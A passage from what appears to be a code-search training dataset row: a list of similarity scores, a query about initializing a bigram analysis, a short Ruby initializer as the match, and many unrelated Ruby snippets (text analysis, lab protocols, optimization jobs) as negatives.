"0.5437364",
"0.54246706",
"0.5409716",
"0.5404774",
"0.5400512",
"0.53968036",
"0.5390916",
"0.5385529",
"0.5379714",
"0.5369833",
"0.5365538",
"0.5357942",
"0.53541493",
"0.535275",
"0.534738",
"0.53423893",
"0.534182",
"0.53412354",
"0.5336385",
"0.5324742",
"0.5324329",
"0.5323311",
"0.53205985",
"0.5319649",
"0.5313727",
"0.5313727",
"0.53134054",
"0.53134054",
"0.53073263",
"0.53073263",
"0.5305068",
"0.53016484",
"0.5288735",
"0.5286145",
"0.5283567",
"0.5282695",
"0.5282319",
"0.52793616",
"0.5278602",
"0.52726513",
"0.52701056",
"0.52672356",
"0.5264436",
"0.5261678",
"0.5259808",
"0.5234852",
"0.52330184",
"0.52328926",
"0.52321607",
"0.52321607",
"0.523208",
"0.52261597",
"0.5214336",
"0.5203293",
"0.5202386",
"0.5196128",
"0.5191743",
"0.51723766",
"0.516568",
"0.5163488",
"0.5163024",
"0.51598185",
"0.5157768",
"0.5154209"
] | 0.0 | -1 |
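A minimal, runnable sketch of the strip-and-collapse pattern that the transform_property_value negative at the top of this record illustrates. It assumes the loofah gem is installed and STRIP_HTML is truthy; the transform name and the sample input are illustrative, not taken from any snippet above.

require 'cgi'
require 'loofah'

STRIP_HTML = true

# Hypothetical harness around the pattern: strip tags with Loofah,
# decode leftover entities, then collapse runs of whitespace.
def transform(value)
  return value unless STRIP_HTML
  text = CGI.unescape_html(Loofah.fragment(value).to_text)
  text.gsub(/\s+/, ' ').strip
end

transform("<p>Fish &amp; Chips</p> <p>5 &lt; 10</p>") # => "Fish & Chips 5 < 10"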
Initialize Bigram analysis instance. analysis - The main Analysis instance. | def initialize(directory)
@directory = directory
@table = {}
@index = Hash.new{ |h,k| h[k] = [] }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize(*args)\n super\n\n # Save parameters\n if focal_word\n self.focal_word = focal_word.mb_chars.downcase.to_s\n self.focal_word_stem = focal_word.stem\n end\n\n # Extract the stop list if provided\n self.stop_words = []\n if language\n self.stop_words = RLetters::Analysis::StopList.for(language)\n end\n\n # Clear final attributes\n self.nodes = []\n self.edges = []\n\n # Run the analysis for each of the gaps\n gaps.each_with_index do |g, i|\n add_nodes_for_gap(g)\n progress&.call((i + 1).to_f / gaps.size.to_f * 100.0)\n end\n\n # Final progress tick\n progress&.call(100)\n end",
"def initialize(report)\n @predictions = []\n @genscan_version = nil\n @date_run = nil\n @time = nil\n @query_name = nil\n @length = nil\n @gccontent = nil\n @isochore = nil\n @matrix = nil\n\n report.each(\"\\n\") do |line|\n case line\n when /^GENSCAN/\n parse_headline(line)\n when /^Sequence/\n parse_sequence(line)\n when /^Parameter/\n parse_parameter(line)\n when /^Predicted genes/\n break\n end\n end\n\n # rests\n i = report.index(/^Predicted gene/)\n j = report.index(/^Predicted peptide sequence/)\n\n # genes/exons\n genes_region = report[i...j]\n genes_region.each(\"\\n\") do |line|\n if /Init|Intr|Term|PlyA|Prom|Sngl/ =~ line\n gn, en = line.strip.split(\" +\")[0].split(/\\./).map {|i| i.to_i }\n add_exon(gn, en, line)\n end\n end\n\n # sequences (peptide|CDS)\n sequence_region = report[j...report.size]\n sequence_region.gsub!(/^Predicted .+?:/, '')\n sequence_region.gsub!(/^\\s*$/, '')\n sequence_region.split(Bio::FastaFormat::RS).each do |ff|\n add_seq(Bio::FastaFormat.new(ff))\n end\n end",
"def prepare_analyzer num_samples\n show do\n title \"Open QiAxcel\"\n note \"Once you are running this job on the Fragment Analyzer computer, open the QiAxcel software from the windows dockbar.\"\n note \"The next steps are to be performed in the QiAxcel software.\"\n end\n \n show do \n title \"Prepare Fragment Analyzer\"\n note \"Click \\\"Back to Wizard\\\" if previous data is displayed.\"\n check \"Under \\\"Process\\\" -> \\\"Process Profile\\\", make sure \\\"PhusionPCR\\\" is selected.\"\n \n check \"Under \\\"Marker\\\", in the \\\"Reference Marker\\\" drop-down, select \\\"15bp_5kb_022216\\\". A green dot should appear to the right of the drop-down.\"\n \n check \"Under \\\"Sample selection\\\", deselect all rows but the first #{(num_samples / ANALYZER_COLUMNS.to_f).ceil}.\"\n \n note \"Perform final check before running analysis\"\n note \"Under \\\"Run Check\\\", manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n end",
"def initialize\n @analyzers = []\n end",
"def new\n @gram = Gram.new\n end",
"def analyzers\n onegram_analyzer = Frequency.call(\n dataset: dataset,\n progress: ->(p) { progress&.call((p.to_f / 100 * 33).to_i) }\n )\n\n # The bigrams should only include the focal word, if the user has\n # restricted the analysis\n bigram_analyzer = Frequency.call(\n dataset: dataset,\n ngrams: 2,\n inclusion_list: focal_word,\n num_blocks: 1,\n split_across: true,\n progress: ->(p) { progress&.call((p.to_f / 100 * 33).to_i + 33) }\n )\n\n [onegram_analyzer, bigram_analyzer]\n end",
"def analyze\n @analysis = Analysis.new(directory)\n @analysis.scan\n #@analysis.save!\n end",
"def runAnalyzer(num_samples,inhash)\n # select profile for run\n show do \n title \"Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}\" # this is just a profile name, should be ok for other polymerases\n note \"Click <b>Back to Wizard</b> if previous data is displayed.\"\n check \"Under <b>Process -> Process Profile</b>, make sure <b>#{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}</b> is selected.\"\n end\n \n # select alignment marker\n ref_marker = (inhash[:sampleTypes] == 'DNA') ? REF_MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] : REF_MARKERS[inhash[:type_ind] ]\n show do \n title \"Select alignment marker\"\n check \"Under <b>Marker</b>, in the <b>Reference Marker </b> drop-down, select <b>#{ref_marker}</b>. A green dot should appear to the right of the drop-down.\"\n end\n \n # empty rows\n if inhash[:sampleTypes] == 'RNA'\n num_samples = num_samples + 1 # Include the ladder in the first well of the first stripwell\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n (num_samples % WELLS_PER_STRIPWELL) > 0 ? nonempty_rows + 1 : nonempty_rows\n else\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n end\n show do \n title \"Deselect empty rows\"\n check \"Under <b>Sample selection</b>, deselect all rows but the first #{nonempty_rows}.\"\n end\n \n # check \n show do \n title \"Perform final check before running analysis\"\n note \"Under <b>Run Check</b>, manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n \n # run and ask tech for remaining number of runs\n run_data = show do \n title \"Run analysis\"\n note \"If you can't click <b>Run</b>, and there is an error that reads <b>The pressure is too low. Replace the nitrogen cylinder or check the external nitrogen source</b>, close the software, and reopen it. Then restart at title - <b>Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]} </b>\"\n check \"Otherwise, click <b>Run</b>\"\n note \"Estimated time of experiment is given at the bottom of the screen\"\n get \"number\", var: \"runs_left\", label: \"Enter the number of <b>Remaining Runs</b> left in this cartridge\", default: 0\n #image \"frag_an_run\"\n end\n \n # return\n run_data[:runs_left]\n \n end",
"def initialize(*args)\n @initial_categories = []\n options = { language: 'en',\n enable_threshold: false,\n threshold: 0.0,\n enable_stemmer: true,\n backend: BayesMemoryBackend.new\n }\n args.flatten.each do |arg|\n if arg.is_a?(Hash)\n options.merge!(arg)\n else\n @initial_categories.push(arg)\n end\n end\n\n unless options.key?(:auto_categorize)\n options[:auto_categorize] = @initial_categories.empty? ? true : false\n end\n\n @language = options[:language]\n @auto_categorize = options[:auto_categorize]\n @enable_threshold = options[:enable_threshold]\n @threshold = options[:threshold]\n @enable_stemmer = options[:enable_stemmer]\n @backend = options[:backend]\n\n populate_initial_categories\n\n if options.key?(:stopwords)\n custom_stopwords options[:stopwords]\n end\n end",
"def initialize programa\n\t\t@tk = []\n\t\t@error = []\n\t\t@parserTk = []\n\t\tlexer(programa)\n\tend",
"def initialize(&block)\n block.call(@msms_pipeline_analysis=MsmsPipelineAnalysis.new) if block\n end",
"def define_analysis(&block)\n @analysis = block\n end",
"def initialize(text)\n @text = text\n @sentences = []\n @result = {}\n @text.gsub!(\"\\n\", '')\n get_sentences\n get_words\n print_concordance\n end",
"def initialize(text)\n @text = text\n @nr_of_words = @text.nr_of_words\n @phrase_length = Ca::Config.instance.google_phrase_lenght\n @result = false\n end",
"def initialize(text)\n @text = text.dup\n @paragraphs = text.split(/\\n\\s*\\n\\s*/)\n @sentences = Lingua::EN::Sentence.sentences(@text)\n @words = []\n @frequencies = {}\n @frequencies.default = 0\n @syllables = 0\n @complex_words = 0\n count_words\n end",
"def analysis\n @analysis || {}\n end",
"def init\n if super\n @offset = 0\n @sg = ITALY\n self\n end\n end",
"def initialize\n @amplitude = {}\n @mixpanel = {}\n @appmetrica = {}\n @appsflyer = {}\n end",
"def initialize_analysis_job(analysis, analysis_job_id, options)\n analysis_job = Job.find(analysis_job_id)\n analysis.run_flag = true\n\n # add in the default problem/algorithm options into the analysis object\n # anything at at the root level of the options are not designed to override the database object.\n analysis.problem = options[:problem].deep_merge(analysis.problem) if analysis.problem\n\n # save other run information in another object in the analysis\n analysis_job.start_time = Time.now\n analysis_job.status = 'started'\n analysis_job.run_options = options.reject { |k, _| [:problem, :data_points, :output_variables].include?(k.to_sym) }\n analysis_job.save!\n\n # Clear out any former results on the analysis\n analysis.results ||= {} # make sure that the analysis results is a hash and exists\n\n analysis.results[options[:analysis_type]] = {}\n\n # merge in the output variables and objective functions into the analysis object which are needed for problem execution\n if options[:output_variables]\n options[:output_variables].reverse_each { |v| analysis.output_variables.unshift(v) unless analysis.output_variables.include?(v) }\n analysis.output_variables.uniq!\n end\n\n # verify that the objective_functions are unique\n if analysis.problem && analysis.problem['algorithm'] && analysis.problem['algorithm']['objective_functions']\n analysis.problem['algorithm']['objective_functions']&.uniq!\n end\n\n # some algorithm specific data to be stored in the database\n # TODO: I have a feeling that this is not initalized in some cases -- so lazily initializing here\n @iteration ||= -1\n analysis['iteration'] = @iteration\n\n # save all the changes into the database\n analysis.save!\n\n # return the analysis job db object\n analysis_job\n end",
"def initialize(piggybank)\n @piggybank = piggybank\n @agent = piggybank.agent\n end",
"def initialize\n\t\t# Default values for query expansion\n\t\t@measure = \"jaccard\"\n\t\t@threshold_gap = 0.3 # Uses this to relax the threshold for PostgreSQL search \n\tend",
"def perform\n @analysis = Analysis.find(@analysis_id)\n\n # get the analysis and report that it is running\n @analysis_job = AnalysisLibrary::Core.initialize_analysis_job(@analysis, @analysis_job_id, @options)\n\n # reload the object (which is required) because the subdocuments (jobs) may have changed\n @analysis.reload\n\n logger.info \"Initializing analysis for #{@analysis.name} with UUID of #{@analysis.uuid}\"\n\n # make this a core method\n if !@analysis.problem['algorithm']['seed'].nil? && (@analysis.problem['algorithm']['seed'].is_a? Numeric)\n logger.info \"Setting R base random seed to #{@analysis.problem['algorithm']['seed']}\"\n @r.converse(\"set.seed(#{@analysis.problem['algorithm']['seed']})\")\n end\n\n selected_variables = Variable.pivots(@analysis.id) + Variable.variables(@analysis.id)\n logger.info \"Found #{selected_variables.count} variables to perturb\"\n\n # generate the probabilities for all variables as column vectors\n grouped = {}\n samples = {}\n var_types = []\n\n # get the probabilities\n logger.info \"Found #{selected_variables.count} variables\"\n\n i_var = 0\n selected_variables.each do |var|\n logger.info \"sampling variable #{var.name} for measure #{var.measure.name}\"\n variable_samples = nil\n # TODO: would be nice to have a field that said whether or not the variable is to be discrete or continuous.\n if var.uncertainty_type == 'discrete'\n variable_samples = var.static_value\n var_types << 'discrete'\n else\n variable_samples = var.static_value\n var_types << 'continuous'\n end\n\n # always add the data to the grouped hash even if it isn't used\n grouped[var.measure.id.to_s] = {} unless grouped.key?(var.measure.id)\n grouped[var.measure.id.to_s][var.id.to_s] = variable_samples\n\n # save the samples to the\n samples[var.id.to_s] = variable_samples\n\n var.r_index = i_var + 1 # r_index is 1-based\n var.save!\n\n i_var += 1\n end\n\n logger.info \"Samples are #{samples}\"\n number_of_runs = @analysis.problem['algorithm']['number_of_runs']\n logger.info \"Number of Runs is #{number_of_runs}\"\n\n (1..number_of_runs).each do |i|\n dp_name = \"Repeat Run Autogenerated #{i}\"\n dp = @analysis.data_points.new(name: dp_name)\n dp.set_variable_values = samples\n dp.save!\n\n logger.info(\"Generated datapoint #{dp.name} for analysis #{@analysis.name}\")\n end\n\n # Only set this data if the analysis was NOT called from another analysis\n unless @options[:skip_init]\n @analysis_job.end_time = Time.now\n @analysis_job.status = 'completed'\n @analysis_job.save!\n @analysis.reload\n end\n @analysis.save!\n\n logger.info \"Finished running analysis '#{self.class.name}'\"\n end",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def initialize\n\t\t@vida = 1\n\t\t@forca = 1\n\t\t@carisma = 1\n\t\t@arma = 1\n\tend",
"def initialize\n \n end",
"def analyze\n analyze_text\n @analyzed = true\n nil\n end",
"def show\n if (@analysis.done?)\n # TODO: Refactor, this is not nice here.\n As2Init.new(@analysis)\n end\n\n end",
"def initialize(plan)\n @scope = :global\n\t @plan = plan\n\t super()\n\t @plan_predicates = Array.new\n\t @neg_plan_predicates = Array.new\n\tend",
"def init\n # import text files\n @target_array = acquire_target_array\n @element_array_list = acquire_element_array_list\n\n # set count\n @init_count = acquire_element_init_count(@element_array_list)\n @temp_count = acquire_element_temp_count(@element_array_list)\n\n self\n end",
"def initialize\n @log = Logger.new(STDOUT)\n @log.level = Logger::INFO\n self.load_config\n self.init_settings\n @assemblers = []\n self.load_assemblers\n end",
"def set_analysis\n @analysis = params[:id] ? Analysis.find(params[:id]) : Analysis.new(analysis_params)\n end",
"def initialize\n initialize!\n end",
"def initialize\n initialize!\n end",
"def initialize()\n #@ch = Concept.init_concept_hash()\n #Indexer.initialize_dict()\n #@ch = Indexer.init_concept_hash\n end",
"def initialize(options={})\n @ram = options[:ram]\n @io = options[:io] || HighLine.new\n @pc = 0\n end",
"def initialize(ann_anime)\n\t\t@ann_anime = ann_anime\n\n\t\t# information available from detail\n\t\t@info = Hash.new\n\t\t@info[:title] = \"Main title\"\n\t\t@info[:synopsis] = \"Plot Summary\"\n\t\t@info[:num_episodes] = \"Number of episodes\"\n\t\t@info[:genres] = \"Genres\"\n\t\t@info[:themes] = \"Themes\"\n\t\t@info[:vintage] = \"Vintage\"\n\t\t@info[:op_theme] = \"Opening Theme\"\n\t\t@info[:ed_theme] = \"Ending Theme\"\n\n\t\t# create methods\n\t\t@info.each do |name, key|\n\t\t\tcreate_method(name) do \n\t\t\t\tinfo = find_info(key)\n\t\t\t\treturn nil if info.nil?\n\t\t\t\tinfo.map do |i|\n\t\t\t\t\ti.content\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\tend",
"def run\n @options[:hmes_frags] = File.expand_path @options[:hmes_frags]\n @options[:bfr_frags] = File.expand_path @options[:bfr_frags]\n analysis = Implementer.new(@options)\n analysis.run\n end",
"def initialize text\n @filters = Despamilator::Filter.new text\n end",
"def initialize\n init\n end",
"def initialize(grammar)\n @arrowhead = \"normal\"\n @rankdir = \"LR\"\n @marked_states = nil\n @grammar = nil\n @grammar = grammar\n end",
"def initialize\n\t\t@tokenizer = Lexer.new # why the defined method is initialize and the called method is new mystifies me\n\t\t@token = nil\n\t\t@blocklevel = 0\n\t\t@node = nil\n\t\t@sav = nil\n\tend",
"def initialize\n question_array = Wordwise::CLI.question_array\n @word = question_array[0][0]\n @def = question_array[1][0]\n @defs = question_array[1].shuffle\n @origin = question_array[2]\n @@all << self\n end",
"def process_init()\n super()\n\n @total_campgrounds = []\n @counters = {\n location: [],\n at_a_glance: []\n }\n end",
"def initialize(repository, analysis = nil, **kw_args)\n # If no Analysis is passed, generate one.\n analysis ||= HowIs.generate_analysis(repository: repository, **kw_args)\n\n # Used by to_html, to_json, etc.\n @analysis = analysis\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def initialize\n @max_buckets = 8\n # TODO: some gradient descent to choose this number\n @min_support = 0.07\n @num_top_grams = 250\n end",
"def perform\n @analysis = Analysis.find(@analysis_id)\n\n # get the analysis and report that it is running\n @analysis_job = AnalysisLibrary::Core.initialize_analysis_job(@analysis, @analysis_job_id, @options)\n\n # reload the object (which is required) because the subdocuments (jobs) may have changed\n @analysis.reload\n\n # Make the analysis directory if it doesn't already exist\n FileUtils.mkdir_p analysis_dir(@analysis.id) unless Dir.exist? analysis_dir(@analysis.id)\n\n # create an instance for R\n @r = AnalysisLibrary::Core.initialize_rserve(APP_CONFIG['rserve_hostname'],\n APP_CONFIG['rserve_port'])\n logger.info 'Setting up R for GA Run'\n # Initialize some variables that are in the rescue/ensure blocks\n cluster = nil\n begin\n @r.converse(\"setwd('#{APP_CONFIG['sim_root_path']}')\")\n\n # make this a core method\n if !@analysis.problem['algorithm']['seed'].nil? && (@analysis.problem['algorithm']['seed'].is_a? Numeric)\n logger.info \"Setting R base random seed to #{@analysis.problem['algorithm']['seed']}\"\n @r.converse(\"set.seed(#{@analysis.problem['algorithm']['seed']})\")\n end\n # R libraries needed for this algorithm\n @r.converse 'library(rjson)'\n @r.converse 'library(R.utils)'\n @r.converse 'library(parallel)'\n @r.converse 'library(doParallel)'\n @r.converse 'library(NRELGA)'\n\n # At this point we should really setup the JSON that can be sent to the worker nodes with everything it needs\n # This would allow us to easily replace the queuing system with rabbit or any other json based versions.\n\n master_ip = 'localhost'\n\n logger.info(\"Master ip: #{master_ip}\")\n logger.info('Starting GA Run')\n\n # Quick preflight check that R, MongoDB, and Rails are working as expected. Checks to make sure\n # that the run flag is true.\n\n # TODO: preflight check -- need to catch this in the analysis module\n if @analysis.problem['algorithm']['maxiter'].nil? || (@analysis.problem['algorithm']['maxiter']).zero?\n raise 'Number of max iterations was not set or equal to zero (must be 1 or greater)'\n end\n\n if @analysis.problem['algorithm']['popSize'].nil? || (@analysis.problem['algorithm']['popSize']).zero?\n raise 'Must have number of samples to discretize the parameter space'\n end\n\n if @analysis.problem['algorithm']['elitism'] < 0 || @analysis.problem['algorithm']['elitism'] > 1\n raise 'elitism must be 0 <= elitism <= 1'\n end\n\n if @analysis.problem['algorithm']['pcrossover'] < 0 || @analysis.problem['algorithm']['pcrossover'] > 1\n raise 'pcrossover must be 0 <= pcrossover <= 1'\n end\n\n if @analysis.problem['algorithm']['pmutation'] < 0 || @analysis.problem['algorithm']['pmutation'] > 1\n raise 'pmutation must be 0 <= pmutation <= 1'\n end\n\n # TODO: add test for not \"minkowski\", \"maximum\", \"euclidean\", \"binary\", \"manhattan\"\n # if @analysis.problem['algorithm']['norm_type'] != \"minkowski\", \"maximum\", \"euclidean\", \"binary\", \"manhattan\"\n # raise \"P Norm must be non-negative\"\n # end\n\n if @analysis.problem['algorithm']['p_power'] <= 0\n raise 'P Norm must be non-negative'\n end\n\n # exit on guideline 14 is no longer true/false. its 0,1,2,3\n # @analysis.exit_on_guideline_14 = @analysis.problem['algorithm']['exit_on_guideline_14'] == 1 ? true : false\n if [0, 1, 2, 3].include? 
@analysis.problem['algorithm']['exit_on_guideline_14']\n @analysis.exit_on_guideline_14 = @analysis.problem['algorithm']['exit_on_guideline_14'].to_i\n logger.info \"exit_on_guideline_14 is #{@analysis.exit_on_guideline_14}\"\n else\n @analysis.exit_on_guideline_14 = 0\n logger.info \"exit_on_guideline_14 is forced to #{@analysis.exit_on_guideline_14}\"\n end\n @analysis.save!\n logger.info(\"exit_on_guideline_14: #{@analysis.exit_on_guideline_14}\")\n\n @analysis.problem['algorithm']['objective_functions'] = [] unless @analysis.problem['algorithm']['objective_functions']\n @analysis.save!\n logger.info(\"exit_on_guideline_14: #{@analysis.exit_on_guideline_14}\")\n\n # check to make sure there are objective functions\n if @analysis.output_variables.count { |v| v['objective_function'] == true }.zero?\n raise 'No objective functions defined'\n end\n\n # find the total number of objective functions\n if @analysis.output_variables.count { |v| v['objective_function'] == true } != @analysis.problem['algorithm']['objective_functions'].size\n raise 'Number of objective functions must equal between the output_variables and the problem definition'\n end\n\n pivot_array = Variable.pivot_array(@analysis.id, @r)\n logger.info \"pivot_array: #{pivot_array}\"\n selected_variables = Variable.variables(@analysis.id)\n logger.info \"Found #{selected_variables.count} variables to perturb\"\n\n # discretize the variables using the LHS sampling method\n @r.converse(\"print('starting lhs to discretize the variables')\")\n logger.info 'starting lhs to discretize the variables'\n\n lhs = AnalysisLibrary::R::Lhs.new(@r)\n samples, var_types, mins_maxes, var_names = lhs.sample_all_variables(selected_variables, 3)\n\n # Result of the parameter space will be column vectors of each variable\n logger.info \"Samples are #{samples}\"\n logger.info \"mins_maxes: #{mins_maxes}\"\n logger.info \"var_names: #{var_names}\"\n logger.info(\"variable types are #{var_types}\")\n\n if samples.empty? || samples.size <= 1\n logger.info 'No variables were passed into the options, therefore exit'\n raise \"Must have more than one variable to run algorithm. Found #{samples.size} variables\"\n end\n\n if var_names.empty? || var_names.empty?\n logger.info 'No variables were passed into the options, therefore exit'\n raise \"Must have at least one variable to run algorithm. Found #{var_names.size} variables\"\n end\n\n unless var_types.all? { |t| t.casecmp('continuous').zero? }\n logger.info 'Must have all continous variables to run algorithm, therefore exit'\n raise \"Must have all continous variables to run algorithm. 
Found #{var_types}\"\n end\n\n # Start up the cluster and perform the analysis\n # cluster = AnalysisLibrary::R::Cluster.new(@r, @analysis.id)\n # unless cluster.configure\n # raise 'could not configure R cluster'\n # end\n\n @r.converse(\"cat('max_queued_jobs: #{APP_CONFIG['max_queued_jobs']}')\")\n worker_ips = {}\n if @analysis.problem['algorithm']['max_queued_jobs']\n if @analysis.problem['algorithm']['max_queued_jobs'] == 0\n logger.info 'MAX_QUEUED_JOBS is 0'\n raise 'MAX_QUEUED_JOBS is 0'\n elsif @analysis.problem['algorithm']['max_queued_jobs'] > 0\n worker_ips[:worker_ips] = ['localhost'] * @analysis.problem['algorithm']['max_queued_jobs']\n logger.info \"Starting R queue to hold #{@analysis.problem['algorithm']['max_queued_jobs']} jobs\"\n end\n elsif !APP_CONFIG['max_queued_jobs'].nil?\n worker_ips[:worker_ips] = ['localhost'] * APP_CONFIG['max_queued_jobs'].to_i\n logger.info \"Starting R queue to hold #{APP_CONFIG['max_queued_jobs']} jobs\"\n else\n raise 'could not start the cluster (cluster size not set correctly)'\n end\n\n # logger.info \"Cluster Started flag is #{cluster.started}\"\n # maxiter is the max number of iterations to calculate\n # varNo is the number of variables (ncol(vars))\n # popSize is the number of sample points in the variable (nrow(vars))\n # epsilongradient is epsilon in numerical gradient calc\n\n # convert to float because the value is normally an integer and rserve/rserve-simpler only handles maxint\n @analysis.problem['algorithm']['failed_f_value'] = @analysis.problem['algorithm']['failed_f_value'].to_f\n @r.command(master_ips: master_ip,\n ips: worker_ips[:worker_ips],\n vartypes: var_types,\n varnames: var_names,\n varseps: mins_maxes[:eps],\n mins: mins_maxes[:min],\n maxes: mins_maxes[:max],\n normtype: @analysis.problem['algorithm']['norm_type'],\n ppower: @analysis.problem['algorithm']['p_power'],\n objfun: @analysis.problem['algorithm']['objective_functions'],\n popSize: @analysis.problem['algorithm']['popSize'],\n run: @analysis.problem['algorithm']['run'],\n maxFitness: @analysis.problem['algorithm']['maxFitness'],\n maxiter: @analysis.problem['algorithm']['maxiter'],\n pcrossover: @analysis.problem['algorithm']['pcrossover'],\n pmutation: @analysis.problem['algorithm']['pmutation'],\n elitism: @analysis.problem['algorithm']['elitism'],\n epsilongradient: @analysis.problem['algorithm']['epsilon_gradient'],\n debug_messages: @analysis.problem['algorithm']['debug_messages'],\n failed_f: @analysis.problem['algorithm']['failed_f_value']) do\n %{\n rails_analysis_id = \"#{@analysis.id}\"\n rails_sim_root_path = \"#{APP_CONFIG['sim_root_path']}\"\n rails_ruby_bin_dir = \"#{APP_CONFIG['ruby_bin_dir']}\"\n rails_mongodb_name = \"#{AnalysisLibrary::Core.database_name}\"\n rails_mongodb_ip = \"#{master_ip}\"\n rails_run_filename = \"#{@options[:run_data_point_filename]}\"\n rails_create_dp_filename = \"#{@options[:create_data_point_filename]}\"\n rails_root_path = \"#{Rails.root}\"\n rails_host = \"#{APP_CONFIG['os_server_host_url']}\"\n r_scripts_path = \"#{APP_CONFIG['r_scripts_path']}\"\n rails_exit_guideline_14 = \"#{@analysis.exit_on_guideline_14}\"\n\n init <- function(x){\n ruby_command <- \"cd #{APP_CONFIG['sim_root_path']} && #{APP_CONFIG['ruby_bin_dir']}/bundle exec ruby\"\n y <- paste(ruby_command,\" #{APP_CONFIG['sim_root_path']}/worker_init_final.rb -h #{APP_CONFIG['os_server_host_url']} -a #{@analysis_id} -s 'initialize'\",sep=\"\")\n print(paste(\"Run command\",y))\n z <- system(y,intern=TRUE)\n z\n }\n init\n 
source(paste(r_scripts_path,'/functions.R',sep=''))\n source(paste(r_scripts_path,'/ga.R',sep=''))\n }\n end\n logger.info 'Returned from rserve ga block'\n # TODO: find any results of the algorithm and save to the analysis\n rescue StandardError, ScriptError, NoMemoryError => e\n log_message = \"#{__FILE__} failed with #{e.message}, #{e.backtrace.join(\"\\n\")}\"\n logger.error log_message\n @analysis.status_message = log_message\n @analysis.save!\n @analysis_job.status = 'completed'\n @analysis_job.save!\n @analysis.reload\n @analysis.save!\n ensure\n # ensure that the cluster is stopped\n logger.info 'Executing ga.rb ensure block'\n begin\n # cluster.stop if cluster\n rescue StandardError, ScriptError, NoMemoryError => e\n # logger.error \"Error executing cluster.stop, #{e.message}, #{e.backtrace}\"\n end\n # logger.info 'Successfully executed cluster.stop'\n\n # Post process the results and jam into the database\n best_result_json = \"#{APP_CONFIG['sim_root_path']}/analysis_#{@analysis.id}/best_result.json\"\n if File.exist? best_result_json\n begin\n logger.info('read best result json')\n temp2 = File.read(best_result_json)\n temp = JSON.parse(temp2, symbolize_names: true)\n logger.info(\"temp: #{temp}\")\n @analysis.results[@options[:analysis_type]]['best_result'] = temp\n @analysis.save!\n logger.info(\"analysis: #{@analysis.results}\")\n rescue StandardError => e\n logger.error 'Could not save post processed results for bestresult.json into the database'\n end\n end\n\n # Post process the results and jam into the database\n converge_flag_json = \"#{APP_CONFIG['sim_root_path']}/analysis_#{@analysis.id}/convergence_flag.json\"\n if File.exist? converge_flag_json\n begin\n logger.info('read converge_flag.json')\n temp2 = File.read(converge_flag_json)\n temp = JSON.parse(temp2, symbolize_names: true)\n logger.info(\"temp: #{temp}\")\n @analysis.results[@options[:analysis_type]]['convergence_flag'] = temp\n @analysis.save!\n logger.info(\"analysis: #{@analysis.results}\")\n rescue StandardError => e\n logger.error 'Could not save post processed results for converge_flag.json into the database'\n end\n end\n\n # Only set this data if the analysis was NOT called from another analysis\n unless @options[:skip_init]\n @analysis_job.end_time = Time.now\n @analysis_job.status = 'completed'\n @analysis_job.save!\n @analysis.reload\n end\n @analysis.save!\n\n logger.info \"Finished running analysis '#{self.class.name}'\"\n end\n end",
"def initialize(cfg)\n @scoring = Scoring::Methods[cfg['scoring']]\n @tapecount = cfg['tapecount'].to_i\n @tiebreak = cfg['tiebreak'] # TODO: use\n\n # construct a hill of dummy programs\n\n nprogs = cfg['size'].to_i\n\n @progs = {}\n @hill = Array.new(nprogs)\n\n (0 .. nprogs-1).each do |id|\n prog = \"dummy-#{id}\"\n @progs[prog] = id\n @hill[id] = prog\n end\n\n # construct initial dummy results\n\n @results = ResultMatrix.new(nprogs, @tapecount)\n (0 .. nprogs-2).each do |idA|\n (idA+1 .. nprogs-1).each { |idB| @results[idA, idB] = Array.new(2*@tapecount, 0) }\n end\n end",
"def initialize\n\n\n\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def analysis\n @str = params[:text] ||= '解析対象の文字列'\n @words = Tag.counter(Tag.generate(@str))\n end",
"def initialize(frames = 1024)\n $frames = Frame.new(1024)\n $bm = Bitmap.new(1024)\n\n init_segment_table\n end",
"def initialize(income_expense_report)\n init_chart_labels(income_expense_report)\n init_graphs(income_expense_report)\n #do_test()\n end",
"def initialize(label)\n\n # pass a new engine with name :knowledge_base_engine to the super class\n super KnowledgeBase::engine label\n\n # instantiate variables\n @engine_has_matched = false\n @yml_locations = nil\n\n @question_rules = Array.new\n @result_rules = Array.new\n @fact_rules = Array.new\n @triggered_rules = Array.new\n @start_rules = Array.new\n @rules = {}\n\n end",
